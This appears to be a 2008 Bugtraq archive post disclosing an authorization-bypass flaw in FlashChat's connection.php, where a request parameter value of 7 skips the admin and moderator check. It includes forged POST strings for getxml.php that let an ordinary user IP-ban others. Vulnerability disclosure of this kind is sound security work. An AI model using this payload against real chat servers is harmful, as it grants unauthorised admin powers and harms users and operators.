Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

flashchat severe bug
From: ch0p83 () gmail com
Date: 17 Oct 2008 14:44:38 -0000
File: connection.php                            

if( 
                                        ChatServer::userInRole($this->userid, ROLE_ADMIN) || 
                                        ChatServer::userInRole($this->userid, ROLE_MODERATOR) ||
                                        ($req['s'] == 7) <-- *bypass line*
                                  )


This piece of code allows a normal user to bypass role filtering and to be granted admin role as a normal user. To 
exploit the vulnerability simply send to getxml.php, while into the chat, this post data string (for example 
intercepting and modifying a legal message packet sent to the server with tamper data plugin of firefox):

for example to ban a user simply add the bypass to the normal ban string request:

replace:
//normal message sent to server thas has being intercepted
sendAndLoad=%5Btype%20Function%5D&t=hi everybody&r=0&id=

with:
//normal ban packet used by admins or mods
sendAndLoad=%5Btype%20Function%5D&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

//forged packet send by attacker
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=

*note the s=7 added

this will ip-ban user with id 5581 from chat.

eLiSiA - 17-10-2008

  By Date           By Thread  

Current thread:
  • flashchat severe bug ch0p83 (Oct 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]